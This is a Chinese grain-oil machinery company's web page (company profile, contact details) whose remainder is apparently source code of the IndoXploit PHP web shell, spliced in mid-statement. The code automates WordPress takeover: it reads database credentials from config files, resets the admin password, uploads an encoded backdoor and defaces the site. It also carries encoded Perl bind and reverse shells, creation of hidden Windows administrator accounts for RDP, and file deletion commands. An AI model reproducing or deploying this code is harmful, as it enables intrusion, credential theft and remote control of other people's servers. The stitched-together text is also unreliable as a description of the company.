Our Products Oil Expeller
About Us China Dingzhou Yongsheng Grain and Oil Machinery Co., Ltd. was founded in 2003, predecessor is Baoding Light Industry Machinery Factory. Our company is specialized in producing grain and oil processing machinery and equipment in China. Existing professional and technical personnel more than 80 people, including grain and oil professional senior engineer 22 people, covers an area of 35000 square meters, immobilisation corporelle is $15 million. With all kinds of modern mechanical processing equipment 95 units, heat treatment carburizing process for computer fully automatic temperature control, can meet the national advanced standards, test means of physical testing mechanical performance is complete. Read More
Oil Processing Plant Oil Expeller
latest news Oil Expeller
Contact Us

Add: Science and Technology Park, DingZhou, Hebei

E-mail: info@oilmillchina.com

Tel: +86 312 2727 088

Tel: +86 186 3122 6706 (David)

Tel: +86 178 0322 6076 (Candy)

Fax: +86 312 2621 678

Copyright © Dingzhou Yongsheng Grain and Oil Machinery Co., Ltd. All Rights Reserved

Online Services
yongsheng +86 186 3122 6706 +86 178 0322 6076
postResult = curl_exec($ch6); curl_close($ch6); $as = "$target/k.php"; $bs = anucurl($as); if(preg_match("#$script#is", $bs)) { echo "[+] berhasil mepes...
"; echo "[+] $as

"; } else { echo "[-] gagal mepes...
"; echo "[!!] coba aja manual:
"; echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; } mysql_close($conn); } } } } else { echo "

WordPress Auto Deface




NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET['do'] == 'auto_dwp2') { if($_POST['auto_deface_wp']) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION,true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array( "log" => "$userr", "pwd" => "$pass", "rememberme" => "forever", "wp-submit" => "$wp_submit", "redirect_to" => "$web", "testcookie" => "1", ); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode(" ", $_POST['link']); $script = htmlspecialchars($_POST['script']); $user = "indoxploit"; $pass = "indoxploit"; $passx = md5($pass); foreach($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { echo "[-] error, gabisa ambil nama domain nya
"; } else { echo "[+] $target
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); if(!$conn OR !$db OR !$update) { echo "[-] MySQL Error: ".mysql_error()."

"; mysql_close($conn); } else { $site = "$target/wp-login.php"; $site2 = "$target/wp-admin/theme-install.php?upload"; $b1 = anucurl($site2); $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />"); $b = lohgin($site, $site2, $user, $pass, $wp_sub); $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />"); $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); $www = "m.php"; $fp5 = fopen($www,"w"); fputs($fp5,$upload3); $post2 = array( "_wpnonce" => "$anu2", "_wp_http_referer" => "/wp-admin/theme-install.php?upload", "themezip" => "@$www", "install-theme-submit" => "Install Now", ); $ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data3 = curl_exec($ch); curl_close($ch); $y = date("Y"); $m = date("m"); $namafile = "id.php"; $fpi = fopen($namafile,"w"); fputs($fpi,$script); $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch6, CURLOPT_COOKIESESSION,true); $postResult = curl_exec($ch6); curl_close($ch6); $as = "$target/k.php"; $bs = anucurl($as); if(preg_match("#$script#is", $bs)) { echo "[+] berhasil mepes...
"; echo "[+] $as

"; } else { echo "[-] gagal mepes...
"; echo "[!!] coba aja manual:
"; echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; } mysql_close($conn); } } } else { echo "

WordPress Auto Deface V.2

Link Config:


"; } } elseif($_GET['do'] == 'network') { echo "
Bind Port:
PORT:
Back Connect:
Server:    PORT:
"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; if(isset($_POST['sub_bp'])) { $f_bp = fopen("/tmp/bp.pl", "w"); fwrite($f_bp, base64_decode($bind_port_p)); fclose($f_bp); $port = $_POST['port_bind']; $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &"); sleep(1); echo "
".$out."
".exe("ps aux | grep bp.pl")."
"; unlink("/tmp/bp.pl"); } $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; if(isset($_POST['sub_bc'])) { $f_bc = fopen("/tmp/bc.pl", "w"); fwrite($f_bc, base64_decode($bind_connect_p)); fclose($f_bc); $ipbc = $_POST['ip_bc']; $port = $_POST['port_bc']; $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &"); sleep(1); echo "
".$out."
".exe("ps aux | grep bc.pl")."
"; unlink("/tmp/bc.pl"); } } elseif($_GET['do'] == 'krdp_shell') { if(strtolower(substr(PHP_OS, 0, 3)) === 'win') { if($_POST['create']) { $user = htmlspecialchars($_POST['user']); $pass = htmlspecialchars($_POST['pass']); if(preg_match("/$user/", exe("net user"))) { echo "[INFO] -> user $user sudah ada"; } else { $add_user = exe("net user $user $pass /add"); $add_groups1 = exe("net localgroup Administrators $user /add"); $add_groups2 = exe("net localgroup Administrator $user /add"); $add_groups3 = exe("net localgroup Administrateur $user /add"); echo "[ RDP ACCOUNT INFO ]
------------------------------
IP: ".$ip."
Username: $user
Password: $pass
------------------------------

[ STATUS ]
------------------------------
"; if($add_user) { echo "[add user] -> Berhasil
"; } else { echo "[add user] -> Gagal
"; } if($add_groups1) { echo "[add localgroup Administrators] -> Berhasil
"; } elseif($add_groups2) { echo "[add localgroup Administrator] -> Berhasil
"; } elseif($add_groups3) { echo "[add localgroup Administrateur] -> Berhasil
"; } else { echo "[add localgroup] -> Gagal
"; } echo "------------------------------
"; } } elseif($_POST['s_opsi']) { $user = htmlspecialchars($_POST['r_user']); if($_POST['opsi'] == '1') { $cek = exe("net user $user"); echo "Checking username $user ....... "; if(preg_match("/$user/", $cek)) { echo "[ Sudah ada ]
------------------------------

$cek
"; } else { echo "[ belum ada ]"; } } elseif($_POST['opsi'] == '2') { $cek = exe("net user $user indoxploit"); if(preg_match("/$user/", exe("net user"))) { echo "[change password: indoxploit] -> "; if($cek) { echo "Berhasil"; } else { echo "Gagal"; } } else { echo "[INFO] -> user $user belum ada"; } } elseif($_POST['opsi'] == '3') { $cek = exe("net user $user /DELETE"); if(preg_match("/$user/", exe("net user"))) { echo "[remove user: $user] -> "; if($cek) { echo "Berhasil"; } else { echo "Gagal"; } } else { echo "[INFO] -> user $user belum ada"; } } else { // } } else { echo "-- Create RDP --
-- Option --
"; } } else { echo "Fitur ini hanya dapat digunakan dalam Windows Server."; } } elseif($_GET['act'] == 'newfile') { if($_POST['new_save_file']) { $newfile = htmlspecialchars($_POST['newfile']); $fopen = fopen($newfile, "a+"); if($fopen) { $act = ""; } else { $act = "permission denied"; } } echo $act; echo "
Filename:
"; } elseif($_GET['act'] == 'newfolder') { if($_POST['new_save_folder']) { $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']); if(!mkdir($new_folder)) { $act = "permission denied"; } else { $act = ""; } } echo $act; echo "
Folder Name:
"; } elseif($_GET['act'] == 'rename_dir') { if($_POST['dir_rename']) { $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename']).""); if($dir_rename) { $act = ""; } else { $act = "permission denied"; } echo "".$act."
"; } echo "
"; } elseif($_GET['act'] == 'delete_dir') { if(is_dir($dir)) { if(is_writable($dir)) { @rmdir($dir); @exe("rm -rf $dir"); @exe("rmdir /s /q $dir"); $act = ""; } else { $act = "could not remove ".basename($dir).""; } } echo $act; } elseif($_GET['act'] == 'view') { echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; echo ""; } elseif($_GET['act'] == 'edit') { if($_POST['save']) { $save = file_put_contents($_GET['file'], $_POST['src']); if($save) { $act = "Saved!"; } else { $act = "permission denied"; } echo "".$act."
"; } echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; echo "

"; } elseif($_GET['act'] == 'rename') { if($_POST['do_rename']) { $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename']).""); if($rename) { $act = ""; } else { $act = "permission denied"; } echo "".$act."
"; } echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; echo "
"; } elseif($_GET['act'] == 'delete') { $delete = unlink($_GET['file']); if($delete) { $act = ""; } else { $act = "permission denied"; } echo $act; } else { if(is_dir($dir) === true) { if(!is_readable($dir)) { echo "can't open directory. ( not readable )"; } else { echo ''; $scandir = scandir($dir); foreach($scandir as $dirx) { $dtype = filetype("$dir/$dirx"); $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx")); if(function_exists('posix_getpwuid')) { $downer = @posix_getpwuid(fileowner("$dir/$dirx")); $downer = $downer['name']; } else { //$downer = $uid; $downer = fileowner("$dir/$dirx"); } if(function_exists('posix_getgrgid')) { $dgrp = @posix_getgrgid(filegroup("$dir/$dirx")); $dgrp = $dgrp['name']; } else { $dgrp = filegroup("$dir/$dirx"); } if(!is_dir("$dir/$dirx")) continue; if($dirx === '..') { $href = "$dirx"; } elseif($dirx === '.') { $href = "$dirx"; } else { $href = "$dirx"; } if($dirx === '.' || $dirx === '..') { $act_dir = "newfile | newfolder"; } else { $act_dir = "rename | delete"; } echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; } } } else { echo "can't open directory."; } foreach($scandir as $file) { $ftype = filetype("$dir/$file"); $ftime = date("F d Y g:i:s", filemtime("$dir/$file")); $size = filesize("$dir/$file")/1024; $size = round($size,3); if(function_exists('posix_getpwuid')) { $fowner = @posix_getpwuid(fileowner("$dir/$file")); $fowner = $fowner['name']; } else { //$downer = $uid; $fowner = fileowner("$dir/$file"); } if(function_exists('posix_getgrgid')) { $fgrp = @posix_getgrgid(filegroup("$dir/$file")); $fgrp = $fgrp['name']; } else { $fgrp = filegroup("$dir/$file"); } if($size > 1024) { $size = round($size/1024,2). 'MB'; } else { $size = $size. 'KB'; } if(!is_file("$dir/$file")) continue; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; } echo "
Name
Type
Size
Last Modified
Owner/Group
Permission
Action
$href
$dtype
-
$dtime
$downer/$dgrp
".w("$dir/$dirx",perms("$dir/$dirx"))."
$act_dir
$file
$ftype
$size
$ftime
$fowner/$fgrp
".w("$dir/$file",perms("$dir/$file"))."
edit | rename | delete | download
"; if(!is_readable($dir)) { // } else { echo "
"; } echo "
Copyright © ".date("Y")." - IndoXploit
"; } ?>